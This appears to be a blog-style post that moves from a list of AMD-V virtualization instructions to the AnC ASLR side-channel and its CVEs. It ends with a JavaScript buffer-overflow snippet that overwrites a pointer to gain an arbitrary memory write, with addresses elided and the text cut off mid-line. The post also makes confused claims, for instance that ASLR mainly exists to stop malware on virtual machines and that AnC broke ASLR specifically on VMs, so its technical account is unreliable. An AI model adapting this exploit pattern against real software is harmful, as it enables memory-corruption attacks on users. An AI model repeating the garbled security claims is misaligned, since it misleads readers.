Allow guests to explicitly communicate with the VMM (VMMCALL)
Set and clear the global interrupt flag (STGI, CLGI)
Invalidate TLB entries in a specified ASID (INVLPGA)
Read and write CR8 in all processor modes
Secure init and control transfer with attestation (SKINIT)

Remark: Fundamentally, VMMs (Hypervisor) work by intercepting and emulating in a safe manner sensitive operations in the guest (such as changing the page tables, which could give a guest access to memory it is not allowed to access).

As such, you are freer to run in the memory address space once AMD-V is enabled in the BIOS (or by the host OS).

Remark: (VERR_SVM_ENABLED)

The confirmed CVEs below look like headaches for virtual machine core designers (VMware, VBox, Hyper-V), right?

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

Since the AnC attack (EVICT+TIME) was found, it can detect which locations in the page table pages are accessed during a page table walk performed by the MMU. In that sense, it has broken the ASLR feature on virtual machines. The objective of ASLR is mainly to avoid malware infection on virtual machines. What scenario can we foresee tomorrow!

Sample: JavaScript code performing an arbitrary memory write (addresses elided in the original)

// prepare buffer with address we want to write to
ptrBuf = ""
// fill buffer: length = relative ptr address - buffer start + ptr offset
while (ptrBuf.length < (0x????? - 0x9????? + 0xC)){ptrBuf += "A"}
ptrBuf += addr

// overflow buffer and overwrite the pointer value after buffer
obj.SetText(ptrBuf,0,0)

// use overwritten pointer to conduct memory write of 4 bytes
obj.SetFontName("\xbe\xba\xfe\xca") 

// WHAT TO WRITE
alert("Check after write:0x???????? + 0x?